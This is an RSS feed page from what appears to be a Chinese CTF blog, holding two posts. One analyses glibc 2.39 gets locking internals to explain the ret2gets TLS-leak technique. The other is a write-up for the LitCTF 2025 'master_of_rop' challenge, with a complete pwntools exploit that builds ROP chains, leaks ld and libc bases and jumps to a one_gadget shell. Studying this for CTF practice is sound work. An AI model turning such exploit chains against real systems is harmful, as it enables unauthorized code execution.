https://blog.ratherhard.com/tags/ret2gets/Recent content in Ret2gets on RatherHard の BlogHugo -- gohugo.iozh-CNMon, 27 Apr 2026 16:14:59 +0800https://blog.ratherhard.com/post/ctf-pwn/analyse/glibc2.39-ret2gets/Sun, 01 Mar 2026 15:07:00 +0000https://blog.ratherhard.com/post/ctf-pwn/analyse/glibc2.39-ret2gets/<img src="https://blog.ratherhard.com/" alt="Featured image of post glibc-2.39 ret2gets 分析" /><h2 id="重要结构">重要结构 </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">typedef</span> <span class="k">struct</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">lock</span><span class="p">;</span> <span class="kt">int</span> <span class="n">cnt</span><span class="p">;</span> <span class="kt">void</span> <span class="o">*</span><span class="n">owner</span><span class="p">;</span> <span class="p">}</span> <span class="n">_IO_lock_t</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="源码分析">源码分析 </h2><h3 id="gets">gets </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">char</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"><span class="nf">_IO_gets</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">size_t</span> <span class="n">count</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">ch</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="o">*</span><span class="n">retval</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nf">_IO_acquire_lock</span> <span class="p">(</span><span class="n">stdin</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">ch</span> <span class="o">=</span> <span class="nf">_IO_getc_unlocked</span> <span class="p">(</span><span class="n">stdin</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">ch</span> <span class="o">==</span> <span class="n">EOF</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">retval</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">unlock_return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">ch</span> <span class="o">==</span> <span class="sc">&#39;\n&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="cm">/* This is very tricky since a file descriptor may be in the </span></span></span><span class="line"><span class="cl"><span class="cm"> non-blocking mode. The error flag doesn&#39;t mean much in this </span></span></span><span class="line"><span class="cl"><span class="cm"> case. We return an error only when there is a new error. */</span> </span></span><span class="line"><span class="cl"> <span class="kt">int</span> <span class="n">old_error</span> <span class="o">=</span> <span class="n">stdin</span><span class="o">-&gt;</span><span class="n">_flags</span> <span class="o">&amp;</span> <span class="n">_IO_ERR_SEEN</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">stdin</span><span class="o">-&gt;</span><span class="n">_flags</span> <span class="o">&amp;=</span> <span class="o">~</span><span class="n">_IO_ERR_SEEN</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">buf</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="p">)</span> <span class="n">ch</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">count</span> <span class="o">=</span> <span class="nf">_IO_getline</span> <span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="n">buf</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">INT_MAX</span><span class="p">,</span> <span class="sc">&#39;\n&#39;</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="n">stdin</span><span class="o">-&gt;</span><span class="n">_flags</span> <span class="o">&amp;</span> <span class="n">_IO_ERR_SEEN</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">retval</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">goto</span> <span class="n">unlock_return</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="n">stdin</span><span class="o">-&gt;</span><span class="n">_flags</span> <span class="o">|=</span> <span class="n">old_error</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">buf</span><span class="p">[</span><span class="n">count</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">retval</span> <span class="o">=</span> <span class="n">buf</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nl">unlock_return</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nf">_IO_release_lock</span> <span class="p">(</span><span class="n">stdin</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">retval</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>_IO_gets 是 gets 的本体</p> <p>这里重点关注 _IO_acquire_lock 和 _IO_release_lock</p> <h3 id="_io_acquire_lock-和-_io_release_lock">_IO_acquire_lock 和 _IO_release_lock </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp"># define _IO_acquire_lock(_fp) \ </span></span></span><span class="line"><span class="cl"><span class="cp"> do { \ </span></span></span><span class="line"><span class="cl"><span class="cp"> FILE *_IO_acquire_lock_file \ </span></span></span><span class="line"><span class="cl"><span class="cp"> __attribute__((cleanup (_IO_acquire_lock_fct))) \ </span></span></span><span class="line"><span class="cl"><span class="cp"> = (_fp); \ </span></span></span><span class="line"><span class="cl"><span class="cp"> _IO_flockfile (_IO_acquire_lock_file); </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp"># define _IO_release_lock(_fp) ; } while (0) </span></span></span></code></pre></td></tr></table> </div> </div><p>注意 cleanup 属性</p> <h3 id="_io_flockfile-和-_io_funlockfile">_IO_flockfile 和 _IO_funlockfile </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp"># define _IO_flockfile(_fp) \ </span></span></span><span class="line"><span class="cl"><span class="cp"> if (((_fp)-&gt;_flags &amp; _IO_USER_LOCK) == 0) _IO_lock_lock (*(_fp)-&gt;_lock) </span></span></span><span class="line"><span class="cl"><span class="cp"># define _IO_funlockfile(_fp) \ </span></span></span><span class="line"><span class="cl"><span class="cp"> if (((_fp)-&gt;_flags &amp; _IO_USER_LOCK) == 0) _IO_lock_unlock (*(_fp)-&gt;_lock) </span></span></span></code></pre></td></tr></table> </div> </div><p>此处 _lock 为 _IO_lock_t 的结构体指针</p> <h3 id="_io_lock_lock-和-_io_lock_unlock">_IO_lock_lock 和 _IO_lock_unlock </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#define _IO_lock_lock(_name) \ </span></span></span><span class="line"><span class="cl"><span class="cp">do { \ </span></span></span><span class="line"><span class="cl"><span class="cp">void *__self = THREAD_SELF; \ </span></span></span><span class="line"><span class="cl"><span class="cp">if (SINGLE_THREAD_P &amp;&amp; (_name).owner == NULL) \ </span></span></span><span class="line"><span class="cl"><span class="cp"> { \ </span></span></span><span class="line"><span class="cl"><span class="cp"> (_name).lock = LLL_LOCK_INITIALIZER_LOCKED; \ </span></span></span><span class="line"><span class="cl"><span class="cp"> (_name).owner = __self; \ </span></span></span><span class="line"><span class="cl"><span class="cp"> } \ </span></span></span><span class="line"><span class="cl"><span class="cp">else if ((_name).owner != __self) \ </span></span></span><span class="line"><span class="cl"><span class="cp"> { \ </span></span></span><span class="line"><span class="cl"><span class="cp"> lll_lock ((_name).lock, LLL_PRIVATE); \ </span></span></span><span class="line"><span class="cl"><span class="cp"> (_name).owner = __self; \ </span></span></span><span class="line"><span class="cl"><span class="cp"> } \ </span></span></span><span class="line"><span class="cl"><span class="cp">else \ </span></span></span><span class="line"><span class="cl"><span class="cp"> ++(_name).cnt; \ </span></span></span><span class="line"><span class="cl"><span class="cp"> } while (0) </span></span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="cp">#define _IO_lock_unlock(_name) \ </span></span></span><span class="line"><span class="cl"><span class="cp">do { \ </span></span></span><span class="line"><span class="cl"><span class="cp">if (SINGLE_THREAD_P &amp;&amp; (_name).cnt == 0) \ </span></span></span><span class="line"><span class="cl"><span class="cp"> { \ </span></span></span><span class="line"><span class="cl"><span class="cp"> (_name).owner = NULL; \ </span></span></span><span class="line"><span class="cl"><span class="cp"> (_name).lock = 0; \ </span></span></span><span class="line"><span class="cl"><span class="cp"> } \ </span></span></span><span class="line"><span class="cl"><span class="cp">else if ((_name).cnt == 0) \ </span></span></span><span class="line"><span class="cl"><span class="cp"> { \ </span></span></span><span class="line"><span class="cl"><span class="cp"> (_name).owner = NULL; \ </span></span></span><span class="line"><span class="cl"><span class="cp"> lll_unlock ((_name).lock, LLL_PRIVATE); \ </span></span></span><span class="line"><span class="cl"><span class="cp"> } \ </span></span></span><span class="line"><span class="cl"><span class="cp">else \ </span></span></span><span class="line"><span class="cl"><span class="cp"> --(_name).cnt; \ </span></span></span><span class="line"><span class="cl"><span class="cp"> } while (0) </span></span></span></code></pre></td></tr></table> </div> </div><h3 id="_io_acquire_lock_fct">_IO_acquire_lock_fct </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> </span></span><span class="line"><span class="cl"><span class="nf">__attribute__</span> <span class="p">((</span><span class="n">__always_inline__</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="nf">_IO_acquire_lock_fct</span> <span class="p">(</span><span class="n">FILE</span> <span class="o">**</span><span class="n">p</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">FILE</span> <span class="o">*</span><span class="n">fp</span> <span class="o">=</span> <span class="o">*</span><span class="n">p</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">((</span><span class="n">fp</span><span class="o">-&gt;</span><span class="n">_flags</span> <span class="o">&amp;</span> <span class="n">_IO_USER_LOCK</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nf">_IO_funlockfile</span> <span class="p">(</span><span class="n">fp</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>由于 cleanup 属性， gets 执行完成后会调用这个</p> <h3 id="_io_stdfile_0_lock">_IO_stdfile_0_lock </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">static</span> <span class="n">_IO_lock_t</span> <span class="n">_IO_stdfile_</span><span class="err">##</span><span class="n">FD</span><span class="err">##</span><span class="n">_lock</span> <span class="o">=</span> <span class="n">_IO_lock_initializer</span><span class="p">;</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#define _IO_lock_initializer { LLL_LOCK_INITIALIZER, 0, NULL } </span></span></span></code></pre></td></tr></table> </div> </div><p>gets 执行完成后， rdi 为 _IO_stdfile_0_lock 的地址，指向一个 _IO_lock_t 结构体</p> <h3 id="thread_self">THREAD_SELF </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp"># define THREAD_SELF \ </span></span></span><span class="line"><span class="cl"><span class="cp"> ({ struct pthread *__self; \ </span></span></span><span class="line"><span class="cl"><span class="cp"> asm (&#34;mov %%fs:%c1,%0&#34; : &#34;=r&#34; (__self) \ </span></span></span><span class="line"><span class="cl"><span class="cp"> : &#34;i&#34; (offsetof (struct pthread, header.self))); \ </span></span></span><span class="line"><span class="cl"><span class="cp"> __self;}) </span></span></span></code></pre></td></tr></table> </div> </div><p>极其高效地获取“当前线程”的线程控制块（TCB，即 struct pthread 结构体）的内存基地址</p> <h2 id="利用思路">利用思路 </h2><p>目标是通过 gets 后 rdi 的残留值传入 puts 以 leak tls</p> <p>在 _IO_gets 中，获取输入之前会先用 _IO_lock_lock 处理 _IO_stdfile_0_lock ，这使得 <code>(_name).owner = __self = THREAD_SELF</code></p> <p>所以只要我们能覆盖前 _IO_stdfile_0_lock 的前 8 字节就可以通过 (_name).owner 去 leak tls</p> <p>但是要注意 _IO_acquire_lock_fct 即 _IO_funlockfile 即 _IO_lock_unlock 会在 gets 结束时执行，这意味着 (_name).cnt 会被减去 1 ，然后若此时 (_name).cnt 为 0 ，那么 (_name).owner 会被清空，无法 leak tls</p> <p>由于 puts 的输出截断于 \x00 ，而 gets 会将末尾设置为 \x00 ，我们需要利用上面 cnt 被减去 1 的机制绕过输出截断</p> <p>若构造 <code>'AAAA\x00\x00\x00'</code> 的 payload ，由于 cnt 只有不为 0 时才会被减去 1 ，而且 cnt 为 0 owner 会被清空，该构造无效</p> <p>因此我们考虑分两次布置：第一次布置 <code>b'A' * 8 + b'\x00' * 6</code> ，目的是触发 <code>(_name).owner == NULL</code> ，第二次布置 <code>b'B' * 4</code> 后即可绕过截断</p> <p>但是在不同 linux 版本的情况下 leak 出的地址与 libc 的偏移会不同，甚至可能 leak 出的是与 ld 相关的部分，这就导致可能需要尝试利用 ld 中的 gadget 再去 leak libc</p>https://blog.ratherhard.com/post/ctf-pwn/nssctf/litctf-2025-master_of_rop/Sat, 28 Feb 2026 19:02:00 +0000https://blog.ratherhard.com/post/ctf-pwn/nssctf/litctf-2025-master_of_rop/<img src="https://blog.ratherhard.com/" alt="Featured image of post NSSCTF-LitCTF-2025-master_of_rop 题解" /><h3 id="题目">题目 </h3><p><a class="link" href="https://www.nssctf.cn/problem/6782" target="_blank" rel="noopener" >题目链接</a></p> <h3 id="攻击思路">攻击思路 </h3><p>没啥好说，就是 ret2gets</p> <p>但是本地和远程的系统环境不同，导致 leak tls 后情况不一致</p> <p>远程挺简单的， libc 与 tls 的偏移固定</p> <p>但我的本地环境 leak 出的是与 ld 相关的地址，这就需要利用 ld 中的 gadget 再去 leak libc</p> <h3 id="exp">exp </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s1">&#39;debug&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">terminal</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;tmux&#39;</span><span class="p">,</span> <span class="s1">&#39;splitw&#39;</span><span class="p">,</span> <span class="s1">&#39;-h&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">debug</span> <span class="o">=</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">debug</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">&#39;./pwn_patched&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;node4.anna.nssctf.cn&#39;</span><span class="p">,</span> <span class="mi">21460</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">rw_addr</span> <span class="o">=</span> <span class="mh">0x404400</span> </span></span><span class="line"><span class="cl"><span class="n">gets_plt</span> <span class="o">=</span> <span class="mh">0x401080</span> </span></span><span class="line"><span class="cl"><span class="n">puts_plt</span> <span class="o">=</span> <span class="mh">0x401060</span> </span></span><span class="line"><span class="cl"><span class="n">again_addr</span> <span class="o">=</span> <span class="mh">0x4011B1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">attack</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mi">32</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">rw_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">gets_plt</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">gets_plt</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">puts_plt</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">again_addr</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;LitCTF2025!</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mi">8</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span> <span class="o">*</span> <span class="mi">6</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mi">4</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">anon_base</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> <span class="o">-</span> <span class="mh">0x740</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;anon_base = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">anon_base</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">ld_base</span> <span class="o">=</span> <span class="n">anon_base</span> <span class="o">+</span> <span class="mh">0xc000</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;ld_base = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">ld_base</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rdi_pop_rbp_ret</span> <span class="o">=</span> <span class="n">ld_base</span> <span class="o">+</span> <span class="mh">0x23dcc</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mi">32</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">rw_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi_pop_rbp_ret</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">anon_base</span> <span class="o">+</span> <span class="mh">0x6c0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">rw_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">puts_plt</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">again_addr</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;LitCTF2025!</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">libc_base</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">6</span><span class="p">)</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> <span class="o">-</span> <span class="mh">0x20b680</span> </span></span><span class="line"><span class="cl"> <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s1">&#39;libc_base = </span><span class="si">{</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">)</span><span class="si">}</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_rbx_ret</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x586e4</span> </span></span><span class="line"><span class="cl"> <span class="n">pop_r12_ret</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x110951</span> </span></span><span class="line"><span class="cl"> <span class="n">onegadget</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0xef4ce</span> </span></span><span class="line"><span class="cl"> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span> <span class="o">*</span> <span class="mi">32</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">rw_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rbx_ret</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_r12_ret</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">onegadget</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;LitCTF2025!</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">attack</span><span class="p">()</span> </span></span></code></pre></td></tr></table> </div> </div>